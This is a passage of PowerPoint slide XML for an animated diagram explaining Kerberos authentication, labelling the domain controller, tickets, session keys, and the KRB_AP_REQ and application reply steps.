            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6671087" y="3138190"/>
              <a:ext cx="1442703" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Domain Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="152" name="TextBox 151"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6589790" y="3370016"/>
              <a:ext cx="1612173" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>KDC Account Database</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="153" name="Picture 1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3374" y="3743383"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="154" name="TextBox 153"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6763295" y="3803666"/>
              <a:ext cx="1553121" cy="1246495"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>User Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Ticket-Granting Service Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="155" name="Picture 1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71714" y="2855866"/>
              <a:ext cx="628030" cy="741586"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="156" name="Picture 1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64123" y="4598833"/>
              <a:ext cx="761875" cy="761875"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="157" name="Picture 15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78170" y="4252507"/>
              <a:ext cx="351842" cy="351842"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="158" name="Picture 1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64480" y="4754182"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="166" name="Workstation Large"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="260877" y="1698423"/>
            <a:ext cx="2745305" cy="3312979"/>
            <a:chOff x="5269256" y="151840"/>
            <a:chExt cx="2745305" cy="3312979"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="167" name="Picture 1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313877" y="302498"/>
              <a:ext cx="2700684" cy="3162321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="168" name="Group 167"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5269256" y="151840"/>
              <a:ext cx="2685437" cy="665914"/>
              <a:chOff x="2925296" y="1597991"/>
              <a:chExt cx="2685437" cy="665914"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="169" name="TextBox 168"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3042792" y="1832275"/>
                <a:ext cx="2567940" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Workstation</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="170" name="TextBox 169"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3042793" y="2079239"/>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171" name="Picture 1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25296" y="1597991"/>
                <a:ext cx="566691" cy="526075"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="159" name="Server"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="211031" y="5011402"/>
            <a:ext cx="2795151" cy="1441365"/>
            <a:chOff x="3025668" y="3771580"/>
            <a:chExt cx="2795151" cy="1441365"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="160" name="Picture 15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169693" y="3953993"/>
              <a:ext cx="2651126" cy="1258952"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="161" name="Picture 16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025668" y="3771580"/>
              <a:ext cx="499308" cy="685686"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="162" name="TextBox 161"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4022720"/>
              <a:ext cx="2562935" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="163" name="TextBox 162"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4254546"/>
              <a:ext cx="2562935" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Service Credentials Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="164" name="Picture 16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22319" y="4593843"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="165" name="TextBox 164"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3932492" y="4653136"/>
              <a:ext cx="1575612" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="182" name="Picture 1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036" y="2449595"/>
            <a:ext cx="327713" cy="327713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="TextBox 182"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975139" y="2474532"/>
            <a:ext cx="1789823" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>User Key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Ticket-Granting Ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Ticket-Granting Service Session Key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Service Ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Session Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="184" name="Picture 1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109" y="2890389"/>
            <a:ext cx="472016" cy="312696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="185" name="Picture 1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3663" y="3316166"/>
            <a:ext cx="348452" cy="348452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="187" name="Picture 18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4792" y="3838621"/>
            <a:ext cx="475522" cy="315018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Right Arrow 187"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3336953" y="2242964"/>
            <a:ext cx="2502616"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en-US" sz="1200" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>5. KRB_AP_REQ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="199" name="Group 198"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3338988" y="2446751"/>
            <a:ext cx="2500581" cy="997024"/>
            <a:chOff x="3338988" y="2446751"/>
            <a:chExt cx="2500581" cy="997024"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="190" name="Group 189"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3338988" y="2446751"/>
              <a:ext cx="2500581" cy="997024"/>
              <a:chOff x="3111530" y="3857261"/>
              <a:chExt cx="2500581" cy="997024"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="192" name="Rectangle 191"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3111530" y="3857261"/>
                <a:ext cx="2500581" cy="99702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spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="193" name="TextBox 192"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3692408" y="4047198"/>
                <a:ext cx="1671680" cy="623248"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Service Ticket</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Authenticator</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="198" name="Picture 19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403145" y="2744455"/>
              <a:ext cx="367829" cy="601182"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="197" name="Picture 19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07573" y="2564777"/>
              <a:ext cx="475522" cy="315018"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="215" name="Group 214"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6089667" y="3599124"/>
            <a:ext cx="2693477" cy="3143132"/>
            <a:chOff x="5693658" y="2843111"/>
            <a:chExt cx="2693477" cy="3143132"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="200" name="AP_REQ Content"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5693658" y="2843111"/>
              <a:ext cx="2693477" cy="3143132"/>
              <a:chOff x="6158571" y="1914643"/>
              <a:chExt cx="2693477" cy="3143132"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="201" name="AP_REQ Content"/>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158571" y="1914643"/>
                <a:ext cx="2693477" cy="3143132"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="202" name="TextBox 201"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6911533" y="4523428"/>
                <a:ext cx="1054776" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Authenticator</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="203" name="Picture 20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559893" y="4340281"/>
                <a:ext cx="289764" cy="573771"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="204" name="TextBox 203"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6928111" y="3160276"/>
                <a:ext cx="1468864" cy="687368"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="2000"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Session Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="2000"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>User Credentials</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="205" name="Picture 20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flipH="1">
                <a:off x="6592484" y="3593474"/>
                <a:ext cx="225134" cy="308918"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="206" name="Picture 20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544210" y="3118172"/>
                <a:ext cx="311866" cy="311866"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="207" name="TextBox 206"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6200422" y="2128997"/>
                <a:ext cx="2584827" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Use Session Key Flags</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="208" name="TextBox 207"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6200422" y="2433024"/>
                <a:ext cx="2584827" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Mutual Authentication Flag</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="209" name="TextBox 208"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5736630" y="3747856"/>
              <a:ext cx="2583706" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Service Ticket</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="210" name="TextBox 209"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5736630" y="5055254"/>
              <a:ext cx="2583706" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Authenticator</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="212" name="Picture 21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830095" y="5051507"/>
              <a:ext cx="193681" cy="284616"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="214" name="Picture 21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838876" y="3729806"/>
              <a:ext cx="195973" cy="287984"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="216" name="Straight Arrow Connector 215"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="201" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4835666" y="3978346"/>
            <a:ext cx="1254001" cy="11923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5" name="Picture 4"/>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65406" y="4251096"/>
            <a:ext cx="358610" cy="358610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76715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9"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="149"/>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1.94444E-6 3.7037E-7 L 0.63906 -0.4787 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="159"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="31944" y="-2393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88"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="188"/>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99"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="216"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="24" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="215"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="26"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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6. Kerberos Application Reply (opt.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
